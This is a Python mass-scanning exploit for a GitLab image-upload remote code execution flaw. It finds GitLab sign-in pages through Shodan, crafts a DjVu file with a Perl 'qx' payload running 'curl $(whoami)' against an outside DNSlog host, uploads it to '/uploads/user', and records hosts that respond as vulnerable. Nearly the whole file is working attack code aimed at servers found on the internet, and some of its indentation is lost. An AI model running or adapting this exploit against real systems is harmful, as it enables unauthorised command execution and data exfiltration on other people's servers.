#!/usr/bin/python3
"""
Modified by: @faisalfs10x
GitHub: https://github.com/faisalfs10x
"""
import os
import shutil
import time

import requests
import shodan
from bs4 import BeautifulSoup
# Silences urllib3's InsecureRequestWarning. The HTTP calls further down in
# this file pass verify=False, so certificate problems are never reported.
requests.packages.urllib3.disable_warnings()
# NOTE(review): the key is read straight from source, so it lands in version
# control and in every copy of this file — keep a real key out of the repo.
SHODAN_API_KEY = " " # insert your shodan api key
api = shodan.Shodan(SHODAN_API_KEY)
# Append-only result file written by check(); its name is echoed at exit.
outfile = "target_result.txt"
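def djvumake_check():
    """Abort with an install hint unless the ``djvumake`` binary is on PATH.

    Uses ``shutil.which`` instead of spawning a shell to run ``which``: the
    lookup happens in-process, so no subprocess is started and the result
    does not depend on a shell being available.

    Raises:
        SystemExit: via ``exit()`` when ``djvumake`` cannot be found.
    """
    if shutil.which("djvumake") is None:
        exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")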
def query():
try:
# Shodan query
results = api.search(' title:"Sign in Gitlab" ')
print("Shodan query started...")
# Show the total results
print('Targets found: {}'.format(results['total']))
print('')
for field in results['matches']:
host = field.get('ip_str')
port = str(field.get('port'))
if port == '443':
target = "https://%s" % (host)
elif port.endswith('443'):
target = "https://%s:%s" % (host, port)
else:
target = "http://%s:%s" % (host, port)
check(target)
except shodan.APIError as e:
print('Error: {}'.format(e))
def check(target):
session = requests.Session()
payload = "\" . qx{`curl $(whoami).rqihma.dnslog.cn`} . \\\n" # replace your own DNSlog Platform or burp collaborator
f1 = open("/tmp/sploit","w")
f1.write('(metadata\n')
f1.write(' (Copyright "\\\n')
f1.write(payload)
f1.write('" b ") )')
f1.close()
os.system('djvumake /tmp/sploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/sploit')
try:
time.sleep(1) # sleep 1 sec to avoid requests.ConnectionError ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
r = session.get(target + "/users/sign_in", verify=False, timeout=30) # add timeout if scanner hanging due to unresponding target
soup = BeautifulSoup(r.text, features="lxml")
csrf = soup.findAll('meta')[16].get("content")
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36',
'Accept': 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': f'{target}/projects',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'X-Requested-With': 'XMLHttpRequest',
'X-CSRF-Token': f'{csrf}'
}
files = {'file': ('sploit.jpg', open('/tmp/sploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
r = session.post(target +'/uploads/user', files=files, headers=headers, verify=False, timeout=30)
marker = 'Failed to process image' # response marker
if marker in r.text:
print(target + " [+] vulnerable")
with open(outfile, "a+") as f:
f.write(target + "\n")
f.close()
else:
print(target + " [-] failed")
except KeyboardInterrupt:
exit('User aborted!')
except requests.ConnectionError as e:
print(target + " - Connection failure")
#print(str(e))
except requests.Timeout as e:
print(target + " - Timeout Error")
#print(str(e))
except requests.RequestException as e:
print(target + " - General Error")
#print(str(e))
except:
print(target + " - Error")
def main():
    """Run the pre-flight tool check, then the Shodan query.

    Any ``Exception`` escaping the two calls is handed to ``exit()``, which
    ends the process and reports the error. ``KeyboardInterrupt`` is not an
    ``Exception`` subclass, so it passes through to the ``__main__`` guard.
    """
    try:
        djvumake_check()
        query()
    except Exception as e:
        exit(e)
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        exit('User aborted!')
    # Reached only when main() returns normally; the exit() calls above skip
    # it. Nothing checks whether outfile was actually written, so the line is
    # printed even when no result was recorded.
    print("[+] Result saved to "+ outfile +" [+]")